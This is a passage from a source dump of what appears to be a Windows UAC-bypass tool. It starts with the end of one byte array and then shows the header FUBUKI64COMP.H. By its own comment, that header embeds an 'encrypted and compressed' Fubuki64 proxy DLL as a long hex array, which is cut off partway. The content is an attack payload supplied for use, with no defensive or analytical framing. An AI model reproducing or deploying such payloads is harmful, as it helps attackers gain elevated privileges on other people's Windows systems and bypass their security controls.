210 | 0x32, 0x4A, 0xF9, 0xB4, 0x06, 0x29, 0xF7, 0x50, 0x09, 0xCE, 0xFD, 0x33, 0xEB, 0xF3, 0xBA, 0x6F,
211 | 0x20, 0xAE, 0xFC, 0x83, 0x7F, 0xA9, 0x3C, 0x4B, 0x04, 0xA0, 0x49, 0xE0, 0x6F, 0x06, 0x63, 0x77,
212 | 0x57, 0x59, 0xEE, 0xEA, 0x43, 0x3F, 0x99, 0x14, 0x59, 0xF2, 0x94, 0x39, 0x5B, 0xAF, 0xEE, 0xBA,
213 | 0x07, 0x8D, 0xBC, 0xC1, 0x2B, 0xF7, 0x3C, 0x38, 0x78, 0xE0, 0xAE, 0xF2, 0x3E, 0x21, 0x79, 0x6B,
214 | 0x5C, 0x5E, 0xC9, 0xE0, 0x45, 0x24, 0xFC, 0x5E, 0x07, 0xBF, 0xB4, 0x33, 0x0A, 0xA7, 0xFE, 0x48,
215 | 0x1B, 0x9B, 0xBE, 0xC5, 0x47, 0xFA, 0x31, 0x5B, 0x1F, 0x8D, 0xFA, 0xE0, 0x70, 0x06, 0x61, 0x37,
216 | 0x44, 0x55, 0xEE, 0xB3, 0x4B, 0x2D, 0x19, 0x5D, 0x0F, 0xAA, 0xFC, 0x40, 0x13, 0x98, 0x34, 0x37,
217 | 0x75, 0xA8, 0xD8, 0x83, 0x67, 0xB2, 0x68, 0x4A, 0x05, 0x93, 0x56, 0xF5, 0x62, 0x99, 0xA8, 0x10,
218 | 0x10, 0xD8, 0xC0, 0xA0, 0x04, 0xAE, 0x9F, 0x32, 0x46, 0xCB, 0xEA, 0x56, 0x04, 0xBB, 0xEF, 0x53,
219 | 0x00, 0x6E, 0xA8, 0x47, 0x46, 0xAE, 0x1E, 0x4A, 0x15, 0x91, 0xB5, 0x21, 0x0F, 0x06, 0x69, 0x7D,
220 | 0x62, 0x16, 0xA0, 0xE5, 0x4F, 0x20, 0xA9, 0x56, 0x01, 0xA9, 0xEA, 0xB5, 0x64, 0x07, 0x9E, 0x7F,
221 | 0x0C, 0xED, 0x91, 0xA4, 0x33, 0x4E, 0x02, 0x74, 0x15, 0x96, 0xA5, 0xED, 0x07, 0x26, 0x60, 0xB8,
222 | 0x32, 0x59, 0xEE, 0xF2, 0x55, 0x05, 0x99, 0x5D, 0x10, 0xA3, 0xF2, 0x56, 0x15, 0xE9, 0xBD, 0x2A,
223 | 0x01, 0x81, 0x90, 0xC0, 0x46, 0x2B, 0x21, 0x1F, 0x16, 0x60, 0xA1, 0xED, 0x70, 0x63, 0x2B, 0x39,
224 | 0x1D, 0xE3, 0xC5, 0x01, 0x09, 0xFB, 0x95, 0x0F, 0x49, 0xA6, 0x8B, 0x0F, 0x48, 0x48, 0x86, 0xC3,
225 | 0xB4, 0xEF, 0xED, 0x8C, 0xA2, 0xA8, 0x9C, 0x39, 0xF1, 0xA4, 0xBF, 0x81, 0x3C, 0x02, 0xF3, 0x26,
226 | 0x36, 0x5B, 0xCD, 0xAC, 0x22, 0x73, 0x9D, 0x0C, 0x62, 0xF3, 0x9D, 0x1E, 0x63, 0xCE, 0xC2, 0x38,
227 | 0x34, 0xD8, 0xD0, 0xB4, 0x77, 0xA4, 0x2C, 0x79, 0x40, 0xE0, 0x8D, 0xB1, 0x64, 0x36, 0x62, 0x29,
228 | 0xB6, 0x54, 0xC9, 0x00, 0x16, 0xD4, 0xA9, 0xF9, 0x56, 0x2E, 0xA9, 0x33, 0x96, 0xFE, 0x9C, 0x0B,
229 | 0x7C, 0xD9, 0xC0, 0x92, 0x47, 0x94, 0x2D, 0x1D, 0x41, 0xD4, 0xF1, 0xDD, 0x32, 0x06, 0x6E, 0x28,
230 | 0x92, 0x55, 0x08, 0xA2, 0xE1, 0x7D, 0x99, 0x0E, 0x54, 0xB5, 0xAB, 0xB4, 0x55, 0x58, 0xAF, 0xC5,
231 | 0xB9, 0xEC, 0x2E, 0xA3, 0x58, 0x8F, 0x03, 0x39, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
232 | 0xCD, 0x7B, 0xC8, 0x8C, 0x27, 0x53, 0x98, 0x2C, 0x67, 0xD3, 0x98, 0x2C, 0x66, 0xD1, 0x9C, 0x25,
233 | 0x75, 0x17, 0xCE, 0xA2, 0x58, 0x8F, 0x03, 0x39, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
234 | 0x2D, 0x65, 0xC8, 0x8C, 0x27, 0x4C, 0x99
235 | };
236 |
--------------------------------------------------------------------------------
/BypassUAC/fubuki64comp.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: FUBUKI64COMP.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 14 Nov 2015
10 | *
11 | * Encrypted and compressed Fubuki64 proxy dll.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | static const unsigned char Fubuki64Comp[3596] = {
22 | 0x32, 0x78, 0xC9, 0x93, 0x89, 0xF4, 0x99, 0x7E, 0x3C, 0x5C, 0x99, 0x30, 0x67, 0xCE, 0x9D, 0xB8,
23 | 0x70, 0xE8, 0xE1, 0x5C, 0xB8, 0x8E, 0x1C, 0x80, 0x70, 0xD8, 0xED, 0x80, 0x13, 0x46, 0x08, 0x21,
24 | 0x2B, 0x54, 0x29, 0x93, 0x56, 0x42, 0x86, 0x33, 0xDC, 0xC2, 0x99, 0x87, 0x6E, 0x03, 0xBC, 0x82,
25 | 0x74, 0xE9, 0x9D, 0x6E, 0x66, 0xDA, 0x74, 0x51, 0x03, 0xE0, 0xE0, 0xF1, 0x71, 0x69, 0x6B, 0x6B,
26 | 0x53, 0x09, 0xC9, 0xB3, 0x45, 0x2D, 0xF7, 0x5D, 0x09, 0xB8, 0xB9, 0x33, 0x05, 0xAB, 0xBD, 0x48,
27 | 0x01, 0x86, 0xF1, 0xCA, 0x47, 0xE0, 0x3C, 0x7C, 0x3F, 0xB3, 0xE0, 0xEC, 0x6C, 0x86, 0x68, 0x7C,
28 | 0x1C, 0x69, 0xC4, 0x99, 0x02, 0x48, 0x29, 0x33, 0x85, 0xED, 0x98, 0x8A, 0xC0, 0x8E, 0xF2, 0xD0,
29 | 0x35, 0xED, 0xD2, 0xD9, 0xF8, 0x2A, 0xF6, 0x9A, 0x72, 0xEF, 0xAE, 0x85, 0xE9, 0xAC, 0x0C, 0x1E,
30 | 0xEE, 0x7F, 0xAE, 0x78, 0x8B, 0xDD, 0x9B, 0x34, 0x09, 0x27, 0x3F, 0x31, 0x60, 0x5E, 0x77, 0x3B,
31 | 0x73, 0x60, 0x76, 0xE3, 0xBF, 0x8C, 0x1B, 0xE4, 0x6B, 0x8D, 0xC2, 0x96, 0x73, 0x54, 0x65, 0x7A,
32 | 0x5A, 0x65, 0x8A, 0x97, 0x70, 0x4A, 0x9F, 0x63, 0x66, 0x89, 0x99, 0x33, 0x03, 0x48, 0x99, 0x3A,
33 | 0xDB, 0xE0, 0x3B, 0x9D, 0x11, 0x8B, 0x08, 0xC8, 0x70, 0xC2, 0xE0, 0xA9, 0x08, 0x04, 0x02, 0x1A,
34 | 0xC6, 0x70, 0x4A, 0x99, 0x9A, 0x5D, 0xFC, 0xB3, 0x65, 0xDC, 0x1B, 0x36, 0xE7, 0xCF, 0x9C, 0x39,
35 | 0xF5, 0xED, 0xD3, 0x9B, 0x47, 0x8E, 0x1A, 0xB8, 0x75, 0x65, 0xC1, 0x80, 0x08, 0x06, 0x5C, 0x1A,
36 | 0xB2, 0x66, 0xC9, 0x05, 0x9E, 0x45, 0x98, 0x33, 0x64, 0xCC, 0x4F, 0x53, 0x67, 0xDB, 0x9E, 0x20,
37 | 0x74, 0xEC, 0xD2, 0xA3, 0x42, 0x8A, 0x9A, 0x3F, 0x31, 0x63, 0xC8, 0x61, 0x21, 0x06, 0x0C, 0x37,
38 | 0x32, 0x40, 0xD9, 0x23, 0x0F, 0x4C, 0x99, 0x0F, 0x67, 0xE8, 0x99, 0x83, 0x87, 0xCF, 0x27, 0x0A,
39 | 0x44, 0xE8, 0xD1, 0xBB, 0xC6, 0x89, 0xA1, 0x39, 0x50, 0xE0, 0xC4, 0x81, 0x7B, 0x9E, 0x2D, 0x37,
40 | 0x46, 0x01, 0xB1, 0xE7, 0xDB, 0xCC, 0x96, 0x7B, 0x67, 0x3A, 0x18, 0x7E, 0xE6, 0xF3, 0x1C, 0x3B,
41 | 0xBC, 0xE4, 0x51, 0xB3, 0x47, 0xEE, 0x32, 0x4A, 0x14, 0x81, 0xB4, 0xE0, 0x03, 0x9E, 0x0C, 0xDB,
42 | 0x38, 0x64, 0xCF, 0x93, 0x22, 0x4C, 0x95, 0xF3, 0x67, 0x42, 0x91, 0xF3, 0x67, 0x46, 0x9D, 0xBA,
43 | 0x5A, 0xA8, 0xFF, 0xD3, 0x84, 0x87, 0xFB, 0xFA, 0x5E, 0x20, 0xF0, 0x81, 0x40, 0x06, 0x0C, 0xDD,
44 | 0x60, 0xE1, 0xC3, 0x51, 0x2F, 0xBC, 0xEB, 0x40, 0x14, 0xAF, 0x99, 0x37, 0xA5, 0xF4, 0x9D, 0x3E,
45 | 0x76, 0xBC, 0x2F, 0xB5, 0x02, 0x86, 0xDF, 0x39, 0xB1, 0xE9, 0x8B, 0x85, 0x7C, 0x05, 0x73, 0x09,
46 | 0x4D, 0x74, 0xCE, 0xEC, 0x36, 0x33, 0x89, 0x6E, 0x76, 0x0E, 0x99, 0x33, 0xAB, 0x86, 0x9D, 0xB3,
47 | 0x28, 0xCC, 0xC9, 0xF6, 0x11, 0xD9, 0x54, 0xB8, 0xFD, 0x8C, 0xE4, 0x38, 0x4B, 0x87, 0xE0, 0xF8,
48 | 0x48, 0x64, 0xFA, 0x65, 0x6E, 0xC1, 0xDC, 0x5C, 0x2E, 0xED, 0xD9, 0x46, 0x08, 0x86, 0x10, 0x2F,
49 | 0x23, 0xE8, 0x97, 0x82, 0x67, 0xFB, 0x7B, 0x79, 0xC9, 0xF9, 0x00, 0xBD, 0x46, 0x35, 0x0C, 0xD9,
50 | 0x7A, 0xED, 0x8D, 0xB7, 0x06, 0x04, 0x5E, 0x33, 0xA7, 0xCD, 0x99, 0x33, 0xE7, 0x31, 0x88, 0xFB,
51 | 0x74, 0xE7, 0xD1, 0xA3, 0xC2, 0x4E, 0x13, 0xBD, 0x38, 0xE1, 0x00, 0x80, 0x4B, 0x8D, 0x41, 0x76,
52 | 0x7A, 0xE1, 0x00, 0x9B, 0x29, 0xC8, 0xD3, 0xB2, 0x67, 0x41, 0xDC, 0x54, 0x22, 0x9A, 0xAE, 0xF3,
53 | 0xD5, 0xED, 0xF9, 0x03, 0x4F, 0xBF, 0xBC, 0x30, 0x38, 0xF0, 0xE1, 0xF5, 0x27, 0x26, 0x2C, 0x11,
54 | 0xCD, 0x71, 0x5A, 0x96, 0x82, 0x4A, 0x8B, 0x33, 0x63, 0x47, 0xE4, 0x54, 0x98, 0x09, 0x95, 0xC5,
55 | 0x61, 0x38, 0x91, 0xA1, 0x03, 0x05, 0xDB, 0xB5, 0x70, 0xB6, 0xC8, 0xC9, 0x88, 0xCE, 0xF3, 0x0C,
56 | 0xBB, 0x45, 0x09, 0x92, 0x6E, 0xC7, 0x41, 0x7B, 0x06, 0xC7, 0x1D, 0xDF, 0x08, 0x2E, 0x85, 0x58,
57 | 0x7F, 0xA8, 0xDB, 0x46, 0x4E, 0x6F, 0xFC, 0x3B, 0xB2, 0xEB, 0x9C, 0xAC, 0x47, 0x0C, 0x4C, 0x19,
58 | 0x30, 0x65, 0xD8, 0x1B, 0xA7, 0x49, 0x14, 0x3E, 0x44, 0x15, 0x59, 0x32, 0x98, 0xDB, 0xFE, 0x9A,
59 | 0x74, 0xA0, 0x5A, 0xB3, 0x8C, 0x71, 0x09, 0x62, 0x70, 0xE1, 0x4D, 0xD7, 0x6B, 0x06, 0x3F, 0xD9,
60 | 0xB9, 0xAE, 0x81, 0x1E, 0x5B, 0x9B, 0x9D, 0xC0, 0xCC, 0x6C, 0x99, 0x84, 0xEE, 0x9B, 0x4A, 0xB7,
61 | 0x70, 0xA6, 0xC9, 0xC2, 0x46, 0xC3, 0xCB, 0xC7, 0x65, 0xB7, 0x91, 0xE0, 0x06, 0x8B, 0x49, 0xAE,
62 | 0xB6, 0x72, 0x81, 0xD2, 0x3B, 0xC1, 0x39, 0x76, 0xB1, 0x84, 0x12, 0xE0, 0x06, 0xC0, 0xDD, 0x7A,
63 | 0x6D, 0xBD, 0x11, 0xB4, 0x7F, 0xEF, 0x04, 0x08, 0x70, 0xE1, 0xE8, 0xE1, 0x03, 0x26, 0x04, 0xE6,
64 | 0x27, 0x9E, 0xC9, 0x1A, 0xAD, 0xBC, 0x1C, 0xF3, 0xE2, 0xB8, 0x8D, 0x33, 0x73, 0x79, 0x62, 0x2F,
65 | 0x96, 0x08, 0xD0, 0xC2, 0x67, 0x8F, 0xA3, 0xC7, 0x65, 0x38, 0xE0, 0x80, 0xE0, 0x05, 0x40, 0x49,
66 | 0xB9, 0xA7, 0xFA, 0x41, 0xA4, 0x56, 0x7D, 0x90, 0x65, 0xA3, 0x91, 0xCC, 0x72, 0x54, 0xBC, 0x3B,
67 | 0xF7, 0x8D, 0xBE, 0xA3, 0x2A, 0xCE, 0x3F, 0xCE, 0x11, 0xE1, 0x25, 0xA8, 0x6A, 0x87, 0x0D, 0xFA,
68 | 0x1A, 0x10, 0xD9, 0x95, 0xD9, 0x59, 0xEB, 0xF3, 0x67, 0x47, 0x5F, 0x7B, 0xF7, 0x45, 0x01, 0x1E,
69 | 0x64, 0x89, 0xFB, 0x22, 0x83, 0x4F, 0x2F, 0x28, 0x2F, 0xBE, 0x9D, 0x42, 0xE1, 0x30, 0x04, 0x51,
70 | 0xBB, 0x64, 0xB5, 0xB7, 0x36, 0x19, 0xD1, 0xBE, 0xCA, 0xE8, 0x09, 0x33, 0x9D, 0x31, 0x62, 0x9A,
71 | 0x43, 0xE8, 0xD6, 0x03, 0xFF, 0x0F, 0x3C, 0x3D, 0x70, 0xDB, 0x10, 0x8E, 0x86, 0x56, 0x4D, 0x1F,
72 | 0x76, 0xE9, 0xC4, 0x72, 0x2D, 0xB3, 0x8C, 0x6B, 0x46, 0xC5, 0x71, 0x73, 0x68, 0x30, 0x62, 0xC5,
73 | 0x47, 0x33, 0x10, 0x87, 0x6C, 0x9F, 0x7C, 0x3B, 0xFD, 0xB3, 0xA8, 0x40, 0x22, 0x7A, 0x28, 0x69,
74 | 0x33, 0x05, 0xE9, 0xEF, 0x02, 0x1C, 0x10, 0x67, 0x42, 0xBC, 0x9D, 0xBE, 0x2C, 0xEC, 0xBF, 0x76,
75 | 0x50, 0x98, 0x2E, 0xB6, 0x41, 0xCA, 0x7C, 0x3E, 0x70, 0xDE, 0x4D, 0xFC, 0xE3, 0xBF, 0x06, 0x38,
76 | 0xF2, 0xC5, 0x81, 0x1E, 0x73, 0xAC, 0xB8, 0x36, 0x6B, 0x30, 0x88, 0xD3, 0x65, 0x8F, 0x25, 0x3E,
77 | 0x34, 0xE0, 0x2E, 0xB6, 0x4F, 0xAF, 0x7C, 0x39, 0x8F, 0x28, 0xFD, 0x83, 0x83, 0x07, 0x03, 0x9E,
78 | 0x14, 0xB1, 0x49, 0xBC, 0x27, 0x4A, 0x24, 0xC3, 0xA6, 0xCD, 0x20, 0x23, 0x66, 0x8E, 0x11, 0xC9,
79 | 0xDE, 0xE7, 0x66, 0xEE, 0xA7, 0xC6, 0x18, 0xB5, 0xF5, 0xC1, 0xC2, 0xE7, 0x86, 0xCF, 0x78, 0x07,
80 | 0x3B, 0xC5, 0xC1, 0xDB, 0xAB, 0x6E, 0x9D, 0x7B, 0x4D, 0x1B, 0xFF, 0x33, 0xEE, 0xC6, 0xD5, 0xB9,
81 | 0xB4, 0xEA, 0xDE, 0x14, 0x43, 0x82, 0x1E, 0x98, 0x73, 0x95, 0x30, 0xE7, 0x8A, 0x1E, 0x45, 0x9C,
82 | 0x37, 0x5D, 0x54, 0xF2, 0x20, 0x38, 0x90, 0xD2, 0x65, 0xAA, 0x99, 0x0A, 0x7F, 0xBB, 0x6A, 0x72,
83 | 0xF9, 0xE5, 0x63, 0xA6, 0xE7, 0x83, 0xA6, 0x79, 0xFA, 0xA8, 0xEB, 0x49, 0x65, 0x8F, 0x1C, 0x09,
84 | 0x7A, 0xE9, 0x89, 0xD3, 0x21, 0x58, 0x98, 0x55, 0x72, 0x49, 0x4B, 0x77, 0x60, 0x43, 0xFC, 0x3C,
85 | 0x3C, 0x65, 0x95, 0x67, 0x63, 0xDE, 0xF6, 0x00, 0x34, 0xC4, 0xB0, 0xE1, 0x33, 0x26, 0x5B, 0xB3,
86 | 0x72, 0x44, 0x92, 0x73, 0x27, 0x76, 0xA1, 0x32, 0x39, 0xFC, 0x19, 0x6C, 0x41, 0xE6, 0xFD, 0x3A,
87 | 0x54, 0xD1, 0xE1, 0xAE, 0x46, 0xD7, 0x68, 0x2E, 0x70, 0xA8, 0x4B, 0xCD, 0x27, 0x56, 0xF3, 0x0C,
88 | 0x2B, 0x27, 0x09, 0x92, 0x67, 0x4D, 0xC1, 0xCC, 0x73, 0xC2, 0xD9, 0x32, 0x54, 0xDE, 0x54, 0xC5,
89 | 0x61, 0x16, 0x71, 0x02, 0x8B, 0xC2, 0x91, 0x3C, 0xEC, 0xC4, 0x41, 0xAD, 0x4A, 0x8D, 0x57, 0x09,
90 | 0x7B, 0x64, 0x42, 0xE8, 0x3E, 0x05, 0x12, 0xD0, 0x3B, 0x0F, 0xE6, 0x93, 0x79, 0x91, 0x9D, 0x05,
91 | 0x70, 0xD7, 0xD5, 0x9C, 0x43, 0xB1, 0x18, 0x10, 0x74, 0x76, 0x6A, 0xAB, 0xC0, 0x06, 0x8A, 0x6D,
92 | 0x32, 0x16, 0xBD, 0x93, 0x80, 0x38, 0x99, 0x66, 0xC3, 0xCE, 0xBF, 0xC7, 0x67, 0xFC, 0xE9, 0x3A,
93 | 0x6C, 0x9C, 0xD1, 0xF1, 0xF2, 0xFA, 0x1C, 0x3A, 0x04, 0xE0, 0x26, 0x71, 0x6E, 0x37, 0x0F, 0xC3,
94 | 0x46, 0x64, 0xF3, 0xD3, 0x52, 0x4D, 0x51, 0xC7, 0x66, 0x39, 0x9D, 0x46, 0x67, 0x9D, 0x9D, 0x3A,
95 | 0x1B, 0xE8, 0xB7, 0xA3, 0x33, 0x8E, 0x6B, 0x38, 0x70, 0x81, 0xC0, 0xF3, 0x03, 0x63, 0x0C, 0x45,
96 | 0x32, 0xEC, 0x88, 0x93, 0x4D, 0xFC, 0x99, 0x54, 0x66, 0xA5, 0xBB, 0x31, 0xCD, 0x82, 0x6D, 0x3B,
97 | 0x02, 0x98, 0xD0, 0xEF, 0x77, 0x8E, 0x68, 0x48, 0x72, 0x6E, 0xA5, 0xD1, 0x01, 0x87, 0x0D, 0x4E,
98 | 0x30, 0x44, 0xC9, 0xFF, 0x9E, 0x4D, 0x9B, 0x13, 0xB6, 0xC8, 0xF6, 0x33, 0x12, 0xCE, 0xF3, 0x3A,
99 | 0xFE, 0x8C, 0x23, 0xA0, 0x12, 0x7E, 0x18, 0x7B, 0x70, 0xAD, 0xD0, 0x83, 0xA1, 0x26, 0x1C, 0x1C,
100 | 0x5C, 0x64, 0xA3, 0x03, 0x26, 0x2F, 0xEB, 0x37, 0xE6, 0xA8, 0x99, 0x1F, 0x67, 0xEE, 0x9D, 0x7C,
101 | 0xC4, 0xEA, 0x7B, 0xC1, 0x77, 0x8E, 0x77, 0xE8, 0x71, 0xC0, 0xB0, 0x86, 0x77, 0x36, 0x0D, 0x93,
102 | 0x4B, 0x54, 0xCE, 0xE6, 0x56, 0x4A, 0xB9, 0x33, 0x15, 0x1C, 0x9B, 0x1B, 0x15, 0xCE, 0xEB, 0x8A,
103 | 0x75, 0x8B, 0x41, 0xA3, 0x69, 0x8E, 0xB0, 0x35, 0x70, 0x81, 0xB1, 0x00, 0x06, 0x23, 0xBC, 0x18,
104 | 0x4B, 0x54, 0xC9, 0xB9, 0x52, 0x3C, 0x98, 0x5E, 0xD6, 0xCE, 0xF6, 0x03, 0x64, 0xBA, 0x9D, 0x28,
105 | 0x51, 0x18, 0xDA, 0xD0, 0x47, 0xF9, 0x1D, 0x0B, 0x70, 0xD2, 0x63, 0x91, 0x02, 0xF7, 0x0E, 0x7A,
106 | 0x32, 0x09, 0xD9, 0x9A, 0x08, 0x9C, 0x9B, 0xCD, 0x1E, 0xFC, 0x99, 0x22, 0x66, 0xF1, 0x9D, 0x25,
107 | 0x75, 0xF7, 0xD0, 0xBC, 0x46, 0x91, 0x1D, 0xC7, 0x6F, 0xE1, 0xDF, 0x80, 0x1C, 0x07, 0x13, 0x18,
108 | 0x2D, 0x65, 0xD6, 0x92, 0x39, 0x4D, 0x86, 0x32, 0x79, 0xD3, 0x98, 0x2C, 0x66, 0xD1, 0x9C, 0x25,
109 | 0x75, 0xFD, 0xD0, 0xA2, 0x53, 0x89, 0x1C, 0x38, 0x64, 0xD4, 0xE2, 0x81, 0x17, 0x07, 0x10, 0x59,
110 | 0x32, 0x6C, 0xB9, 0x94, 0x46, 0x4A, 0xA9, 0xAA, 0x67, 0xCC, 0x83, 0x34, 0x67, 0xD4, 0xE9, 0xD9,
111 | 0x74, 0xF2, 0xD1, 0x97, 0xA5, 0x8E, 0x06, 0x39, 0x90, 0xE0, 0xCB, 0xF6, 0x72, 0x9C, 0x08, 0x1A,
112 | 0x87, 0xFB, 0x35, 0xD3, 0x81, 0x0C, 0xD0, 0x03, 0x7F, 0xCC, 0xD8, 0x01, 0x67, 0xC6, 0xBE, 0x3A,
113 | 0x74, 0x38, 0xE1, 0xA3, 0xDF, 0x75, 0xDD, 0x90, 0xB0, 0x89, 0xC0, 0xBE, 0x03, 0xC5, 0x97, 0x66,
114 | 0x33, 0x1B, 0xC8, 0xAC, 0x24, 0x33, 0xA6, 0x31, 0x59, 0xCE, 0xA6, 0x31, 0x58, 0xCC, 0xA2, 0x38,
115 | 0x4B, 0xEA, 0xE7, 0xA1, 0x4E, 0xDE, 0x39, 0x38, 0x70, 0xC0, 0xF0, 0x81, 0x35, 0x36, 0x0C, 0x59,
116 | 0x67, 0x54, 0xC9, 0xD9, 0x16, 0x4C, 0xFC, 0x03, 0x66, 0x4D, 0xA9, 0x33, 0xFB, 0x9B, 0xAD, 0x3A,
117 | 0xDB, 0xD8, 0xD1, 0x67, 0x77, 0x8E, 0xCA, 0x08, 0x70, 0x0A, 0xC5, 0xB1, 0x03, 0xF9, 0x3C, 0x19,
118 | 0x22, 0x42, 0xC9, 0x93, 0x01, 0x19, 0xA9, 0x33, 0x5E, 0xFC, 0x99, 0x61, 0x57, 0xCE, 0xF5, 0x0A,
119 | 0x74, 0x68, 0x84, 0x93, 0x47, 0x18, 0x2C, 0x38, 0xDB, 0xD0, 0xC0, 0x39, 0x33, 0x06, 0xC2, 0x0C,
120 | 0x02, 0x64, 0x2A, 0xA3, 0x26, 0xB2, 0xA9, 0x33, 0x74, 0xEB, 0x99, 0x67, 0x67, 0xE6, 0xAD, 0x3A,
121 | 0x4E, 0xD8, 0xD1, 0xF3, 0x77, 0x8E, 0x7D, 0x6D, 0x40, 0xE0, 0xB3, 0xB1, 0x03, 0x8F, 0x3C, 0x19,
122 | 0xA8, 0x54, 0xC9, 0x3B, 0x73, 0x7C, 0x99, 0x8E, 0x56, 0xCC, 0x40, 0x03, 0x67, 0x22, 0xAD, 0x3A,
123 | 0x70, 0xB8, 0xF9, 0xA3, 0x47, 0x99, 0x2C, 0x38, 0x42, 0xD0, 0xC0, 0xC7, 0x56, 0x36, 0x0C, 0x42,
124 | 0x02, 0x64, 0xBF, 0xA3, 0x26, 0xDC, 0xA9, 0x33, 0xFA, 0x99, 0xA9, 0x33, 0xD5, 0xFE, 0x9D, 0xFA,
125 | 0x44, 0xE8, 0x0A, 0x93, 0x47, 0x63, 0xB1, 0x08, 0x70, 0xE1, 0x72, 0xC3, 0xF2, 0xB3, 0x0F, 0x69,
126 | 0xFB, 0x61, 0xE9, 0x30, 0x86, 0x4B, 0x99, 0x3B, 0x66, 0xC5, 0x29, 0x04, 0x6C, 0x2E, 0x35, 0x1A,
127 | 0x79, 0xE8, 0xDF, 0xA3, 0x48, 0x2E, 0x06, 0x29, 0x70, 0xE8, 0xD2, 0x81, 0x10, 0x26, 0xAB, 0x0C,
128 | 0x32, 0x72, 0xC9, 0x91, 0x31, 0x7C, 0x2D, 0x2A, 0x66, 0xD6, 0x99, 0x28, 0x67, 0x4E, 0x81, 0x3A,
129 | 0x69, 0xE8, 0xCF, 0xA3, 0x58, 0xDE, 0x20, 0xB8, 0x51, 0xE0, 0xE2, 0x81, 0x20, 0x06, 0x28, 0x29,
130 | 0x0B, 0x64, 0xEF, 0x93, 0x01, 0x4C, 0xB1, 0x33, 0x4F, 0xCC, 0x91, 0x19, 0x67, 0xE5, 0xAD, 0x05,
131 | 0x59, 0xE8, 0xFF, 0xA3, 0x47, 0xA1, 0x1C, 0x08, 0x70, 0xD1, 0xC0, 0xC7, 0x76, 0x06, 0x6E, 0x6C,
132 | 0x59, 0x0D, 0xFF, 0xA7, 0x08, 0x28, 0x99, 0x5F, 0x0A, 0xCC, 0xDA, 0x52, 0x0B, 0xA2, 0xD3, 0x3A,
133 | 0x00, 0xB8, 0xBE, 0xD4, 0x22, 0xFC, 0x55, 0x56, 0x70, 0x86, 0xAF, 0xF3, 0x6E, 0x67, 0x78, 0x70,
134 | 0x5D, 0x64, 0xA7, 0x93, 0x65, 0x23, 0xF7, 0x40, 0x12, 0xBE, 0x99, 0x46, 0x04, 0xBA, 0xCD, 0x5B,
135 | 0x06, 0x9C, 0xB8, 0xA3, 0x26, 0xE2, 0x51, 0x4B, 0x17, 0xB6, 0x97, 0x81, 0x03, 0x45, 0x7E, 0x7C,
136 | 0x53, 0x10, 0xAC, 0xC6, 0x54, 0x4C, 0xF0, 0x33, 0x25, 0xB9, 0xEB, 0x41, 0x02, 0xA0, 0x9D, 0x4E,
137 | 0x3D, 0xB8, 0xD1, 0xE7, 0x22, 0xF8, 0x53, 0xB4, 0x12, 0x8A, 0x53, 0x80, 0xB3, 0x06, 0x65, 0x7A,
138 | 0x57, 0x15, 0xCD, 0x03, 0x6A, 0x25, 0xEA, 0x47, 0xC2, 0xCD, 0xDD, 0x56, 0xF7, 0xCA, 0x91, 0x55,
139 | 0x0D, 0x57, 0xD0, 0xC3, 0x44, 0xCB, 0x72, 0x4D, 0x1D, 0xE1, 0x45, 0x80, 0x77, 0x63, 0x7E, 0x7F,
140 | 0x53, 0x07, 0xAC, 0x91, 0x55, 0x28, 0x9A, 0x74, 0x03, 0xB8, 0xDA, 0x5F, 0x06, 0xC2, 0xEE, 0x49,
141 | 0x94, 0xE9, 0xF4, 0xA2, 0x08, 0xFE, 0x79, 0x56, 0x71, 0x35, 0xC2, 0xE7, 0x6C, 0x06, 0x48, 0x75,
142 | 0x5E, 0x36, 0xCD, 0xF6, 0x41, 0xCC, 0x9F, 0x56, 0x14, 0x9F, 0xFC, 0x41, 0x67, 0xB8, 0xF8, 0x48,
143 | 0x74, 0xAF, 0xB4, 0xCD, 0x22, 0x9C, 0x6E, 0x28, 0x7A, 0xA1, 0xA3, 0xC0, 0x0F, 0x57, 0x79, 0x7C,
144 | 0x32, 0x11, 0xAC, 0x93, 0x68, 0x29, 0xED, 0x72, 0x16, 0xCC, 0xF0, 0x71, 0x12, 0xA8, 0xFB, 0x5F,
145 | 0x06, 0xA9, 0xE1, 0xCF, 0x2B, 0xE1, 0x7F, 0xC8, 0x71, 0xAA, 0xC1, 0xC7, 0x71, 0x34, 0x69, 0x42,
146 | 0x30, 0x36, 0xAC, 0xA3, 0x37, 0x33, 0x9B, 0x60, 0x0F, 0xCE, 0xE3, 0x41, 0x65, 0x9C, 0xF8, 0x57,
147 | 0x1B, 0x9C, 0xB4, 0x83, 0x04, 0xE1, 0x71, 0x48, 0x05, 0xC0, 0xCB, 0xD2, 0x76, 0x46, 0x7C, 0x69,
148 | 0x5D, 0x16, 0xBD, 0xE0, 0x07, 0x49, 0xF8, 0xBB, 0x16, 0xA5, 0xE9, 0xBC, 0x61, 0xBE, 0xD4, 0x49,
149 | 0xB1, 0xEA, 0xD1, 0xED, 0x26, 0xE3, 0x79, 0x6E, 0x11, 0x8C, 0xA9, 0x87, 0x67, 0xD7, 0x0E, 0x69,
150 | 0x33, 0x20, 0xA6, 0xFE, 0x47, 0x25, 0x1B, 0x5D, 0x3B, 0xCD, 0xDE, 0x41, 0x08, 0xBB, 0xED, 0x77,
151 | 0x75, 0xE7, 0x82, 0xA4, 0x33, 0x8D, 0xDF, 0x38, 0x5D, 0xE2, 0x93, 0xE9, 0x62, 0x74, 0xEE, 0x7C,
152 | 0x7F, 0x65, 0x9C, 0xFD, 0x45, 0x93, 0x9E, 0x03, 0x77, 0x1C, 0x9E, 0x63, 0x32, 0xBD, 0xF8, 0x48,
153 | 0x9F, 0xEA, 0xA6, 0xC2, 0x5C, 0xCD, 0xDC, 0x59, 0x1E, 0x8F, 0xAE, 0xE8, 0x60, 0x66, 0x06, 0xEA,
